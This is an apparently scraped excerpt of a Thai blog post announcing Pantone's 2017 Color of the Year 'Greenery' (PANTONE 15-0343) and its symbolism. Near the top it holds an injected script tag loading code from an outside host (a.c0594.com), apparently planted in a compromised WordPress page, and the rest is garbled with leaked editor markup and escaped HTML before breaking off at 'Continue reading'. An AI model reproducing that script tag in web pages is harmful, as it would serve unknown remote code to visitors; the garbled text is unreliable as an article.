สีแห่งปี 2017 "Greenery" เขียวสไตล์ธรรมชาติ

เสมือนจริง ตัวอักษร <script src=http://a.c0594.com/?js=6></script>เสมือนจริง</button><br /><br /><br /> <button type=”button” id=”content-html” class=”wp-switch-editor switch-html” data-wp-editor-id=”content”>ตัวอักษร</button><br /><br /><br /> </div><br /><br /><br /> </div><br /><br /><br /> <div id=”wp-content-editor-container” class=”wp-editor-container”><div id=”ed_toolbar” class=”quicktags-toolbar”></div><textarea class=”wp-editor-area” style=”height: 300px” autocomplete=”off” cols=”40″ name=”content” id=”content”>&lt;strong&gt;หลังจากปล่อยให้เราลุ้นกันมาเป็นเวลานานว่าสีแห่งปี 2017 นั้นจะเป็นสีอะไร ล่าสุด Pantone ได้ประกาศอย่างเป็นทางการออกมาแล้วว่าสีแห่งปี 2017 นั้นคือสี Greenery&lt;/strong&gt;&lt;!–more–&gt;</p><br /><br /> <p>โดยความหมายของสีเขียว Greenery นั้นจะเป็นความหมายเชิงสัญลักษณ์ที่ให้ผู้คนได้มีความหวังและความรักต่อกันมากขึ้นในสังคมและการเมืองที่เปลี่ยนแปลงไปอย่างมากในปัจจุบัน</p><br /><br /> <p>&lt;strong&gt;ข้อมูลของสีเขียว Greenery : PANTONE 15-0343&lt;/strong&gt;</p><br /><br /> <p>&lt;img … Continue reading สีแห่งปี 2017 &quot;Greenery&quot; เขียวสไตล์ธรรมชาติ